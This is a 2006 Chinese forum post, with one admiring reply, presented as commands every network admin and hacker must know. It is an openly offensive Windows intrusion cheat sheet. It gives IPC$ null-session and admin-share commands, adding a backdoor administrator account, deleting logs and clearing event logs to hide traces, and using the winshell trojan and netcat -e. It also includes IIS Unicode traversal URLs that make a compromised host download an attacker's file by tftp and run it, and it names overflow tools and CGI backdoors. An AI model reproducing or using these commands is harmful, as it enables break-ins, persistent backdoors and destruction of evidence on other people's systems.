热搜词
发表于 2006-10-17 21:04:11 | 显示全部楼层 |阅读模式
<P><FONT color=#0000ff>网管和黑客都必须知道的命令</FONT></P><P>=====================================================&nbsp; <BR>&nbsp;(与远程主机建立空管连接) net use <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址&#92;ipc$ "" /use:""&nbsp;&nbsp; <BR>&nbsp;(以管理员身份登录远程主机) net use <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址&#92;ipc$ "密码" /use:"Administrator"&nbsp;&nbsp; <BR>&nbsp;(传送文件到远程主机WINNT目录下)copy 本机目录路径&#92;程序 <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址&#92;admin$&nbsp;&nbsp; <BR>&nbsp;(查看远程主机时间) net time <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址&nbsp;&nbsp; <BR>&nbsp;(定时启动某个程序) at <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址 02:18 readme.exe&nbsp;&nbsp; <BR>&nbsp;(查看共享) net view <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址&nbsp;&nbsp; <BR>&nbsp;(查看netbios工作组列表) nbtstat -A IP地址&nbsp;&nbsp; <BR>&nbsp;(将远程主机C盘映射为自己的F盘) net use f: <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址&#92;c$ ""/user:"Administrator"&nbsp;&nbsp; <BR>&nbsp;(这两条把自己增加到管理员组): net user 用户名 密码 /add&nbsp;&nbsp; <BR>&nbsp;net localgroup Administrators 用户名 /add&nbsp;&nbsp; <BR>&nbsp;(断开连接) net use <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址&#92;ipc$ /delete&nbsp;&nbsp; <BR>&nbsp;=====================================================&nbsp;&nbsp; <BR>&nbsp;擦屁屁:&nbsp;&nbsp; <BR>&nbsp;del C:&#92;winnt&#92;system32&#92;logfiles&#92;*.*&nbsp;&nbsp; <BR>&nbsp;del C:&#92;winnt&#92;system32&#92;config&#92;*.evt&nbsp;&nbsp; <BR>&nbsp;del C:&#92;winnt&#92;system32&#92;dtclog&#92;*.*&nbsp;&nbsp; <BR>&nbsp;del C:&#92;winnt&#92;system32&#92;*.log&nbsp;&nbsp; <BR>&nbsp;del C:&#92;winnt&#92;system32&#92;*.txt&nbsp;&nbsp; <BR>&nbsp;del C:&#92;winnt&#92;*.txt&nbsp;&nbsp; <BR>&nbsp;del C:&#92;winnt&#92;*.log&nbsp;&nbsp; <BR>&nbsp;============================&nbsp; </P><P>&nbsp; ·其它几个命令更厉害&lt;BR&gt;一、netsvc.exe&nbsp;&nbsp; <BR>&nbsp; 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:&nbsp;&nbsp; <BR>&nbsp; netsvc /list <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址&nbsp;&nbsp; <BR>&nbsp; netsvc schedule <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址 /query&nbsp;&nbsp; <BR>&nbsp; netsvc <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址 schedule /start&nbsp;&nbsp; <BR>&nbsp; 二、OpenTelnet.exe&nbsp;&nbsp; <BR>&nbsp; 远程启动主机的Telnet服务,并绑定端口到7878,例如:&nbsp;&nbsp; <BR>&nbsp; OpenTelnet <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址 用户名 密码 1 7878&nbsp;&nbsp; <BR>&nbsp; 然后就可以telnet到主机的7878端口,进入DOS方式下:&nbsp;&nbsp; <BR>&nbsp; telnet IP地址 7878&nbsp;&nbsp; <BR>&nbsp; 三、winshell.exe&nbsp;&nbsp; <BR>&nbsp; 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD&amp;gt;后,可打下面的命令:&nbsp;&nbsp; <BR>&nbsp; p Path (查看winshell主程序的路径信息)&nbsp;&nbsp; <BR>&nbsp; b reBoot (重新启动机器)&nbsp;&nbsp; <BR>&nbsp; d shutDown (关闭机器)&nbsp;&nbsp; <BR>&nbsp; s Shell (执行后你就会看到可爱的“C:&#92;&amp;gt;”)&nbsp;&nbsp; <BR>&nbsp; x eXit (退出本次登录会话,此命令并不终止winshell的运行)&nbsp;&nbsp; <BR>&nbsp; CMD&amp;gt; <A target=_blank href="http://.../srv.exe" target=_blank>http://.../srv.exe</A> (通过http下载其他网站上的文件到运行winshell的机器上)&nbsp;&nbsp; <BR>&nbsp; 四、3389登陆器,GUI方式登录远程主机的&nbsp;&nbsp; <BR>&nbsp; 五、elsave.exe&nbsp;&nbsp; <BR>&nbsp; 事件日志清除工具&nbsp;&nbsp; <BR>&nbsp; elsave -s <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址 -l "application" -C&nbsp;&nbsp; <BR>&nbsp; elsave -s <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址 -l "system" -C&nbsp;&nbsp; <BR>&nbsp; elsave -s <A target=_blank href="file://IP/" target=_blank>&#92;&#92;IP</A>地址 -l "security" -C&nbsp;&nbsp; <BR>&nbsp; 执行后成功清除应用程序日志,系统日志,安全日志&nbsp;&nbsp; <BR>&nbsp; 六、hbulot.exe&nbsp;&nbsp; <BR>&nbsp; 开启win2kserver和winxp的3389服务&nbsp;&nbsp; <BR>&nbsp; hbulot [/r]&nbsp;&nbsp; <BR>&nbsp; 使用/r表示安装完成后自动重起目标使设置生效。&nbsp;&nbsp; <BR>&nbsp; 七、nc.exe(netcat.exe)&nbsp;&nbsp; <BR>&nbsp; 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。&nbsp;&nbsp; <BR>&nbsp; 想要连接到某处: nc [-options] hostname port [ports] ...&nbsp;&nbsp; <BR>&nbsp; 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]&nbsp;&nbsp; <BR>&nbsp; 参数:&nbsp;&nbsp; <BR>&nbsp; -e prog 程序重定向,一旦连接,就执行 [危险!!]&nbsp;&nbsp; <BR>&nbsp; -g gateway source-routing hop point, up to 8&nbsp;&nbsp; <BR>&nbsp; -G num source-routing pointer: 4, 8, 12, ...&nbsp;&nbsp; <BR>&nbsp; -h 帮助信息&nbsp;&nbsp; <BR>&nbsp; -i secs 延时的间隔&nbsp;&nbsp; <BR>&nbsp; -l 监听模式,用于入站连接&nbsp;&nbsp; <BR>&nbsp; -n 指定数字的IP地址,不能用hostname&nbsp;&nbsp; <BR>&nbsp; -o file 记录16进制的传输&nbsp;&nbsp; <BR>&nbsp; -p port 本地端口号&nbsp;&nbsp; <BR>&nbsp; -r 任意指定本地及远程端口&nbsp;&nbsp; <BR>&nbsp; -s addr 本地源地址&nbsp;&nbsp; <BR>&nbsp; -u UDP模式&nbsp;&nbsp; <BR>&nbsp; -v 详细输出——用两个-v可得到更详细的内容&nbsp;&nbsp; <BR>&nbsp; -w secs timeout的时间&nbsp;&nbsp; <BR>&nbsp; -z 将输入输出关掉——用于扫描时&nbsp;&nbsp; <BR>&nbsp; 八、TFTPD32.EXE&nbsp;&nbsp; <BR>&nbsp; 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:&nbsp;&nbsp; <BR>&nbsp; <A target=_blank href="http://ip/" target=_blank>http://IP</A>地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:&#92;winnt&#92;system32&#92;文件名&nbsp;&nbsp; <BR>&nbsp; 然后可以直接令文件运行:&nbsp;&nbsp; <BR>&nbsp; <A target=_blank href="http://ip/" target=_blank>http://IP</A>地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名&nbsp;&nbsp; <BR>&nbsp; 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。&nbsp;&nbsp; <BR>&nbsp; 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。&nbsp;&nbsp; <BR>&nbsp; 一、一 Xscan命令行运行参数说明:&nbsp;&nbsp; <BR>&nbsp; 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。&nbsp;&nbsp; <BR>&nbsp; 1.命令格式: xscan -host [-]&amp;nbsp; [其他选项]&nbsp;&nbsp; <BR>&nbsp; xscan -file&amp;nbsp;&amp;nbsp; [其他选项]&nbsp;&nbsp; <BR>&nbsp; 其中 含义如下:&nbsp;&nbsp; <BR>&nbsp; -port : 检测常用服务的端口状态(可通过&#92;dat&#92;config.ini文件的"PORT-SCAN-OPTIONS&#92;PORT-LIST"项定制待检测端口列表);&nbsp;&nbsp; <BR>&nbsp; -ftp : 检测FTP弱口令(可通过&#92;dat&#92;config.ini文件设置用户名/密码字典文件);&nbsp;&nbsp; <BR>&nbsp; -ntpass : 检测NT-Server弱口令(可通过&#92;dat&#92;config.ini文件设置用户名/密码字典文件);&nbsp;&nbsp; <BR>&nbsp; -cgi : 检测CGI漏洞(可通过&#92;dat&#92;config.ini文件的"CGI-ENCODE&#92;encode_type"项设置编码方案);&nbsp;&nbsp; <BR>&nbsp; -iis : 检测IIS漏洞(可通过&#92;dat&#92;config.ini文件的"CGI-ENCODE&#92;encode_type"项设置编码方案);&nbsp;&nbsp; <BR>&nbsp; [其他选项] 含义如下:&nbsp;&nbsp; <BR>&nbsp; -v: 显示详细扫描进度&nbsp;&nbsp; <BR>&nbsp; -p: 跳过Ping不通的主机&nbsp;&nbsp; <BR>&nbsp; -o: 跳过没有检测到开放端口的主机&nbsp;&nbsp; <BR>&nbsp; -t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10&nbsp;&nbsp;</P><p>[此帖子已被 灰儿 在 2006-10-18 20:00:11 编辑过]
全部评论1
雨儿 发表于 2006-10-18 10:31:49 | 显示全部楼层

Re:网管和黑客都必须知道的命令

好东西,可惜俺看不懂哦。<IMG src="http://www.sq01.cn/bbs/images/Emotions/21.gif">
回复

使用道具 举报

回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-11-23 00:35 , Processed in 0.162610 second(s), 22 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team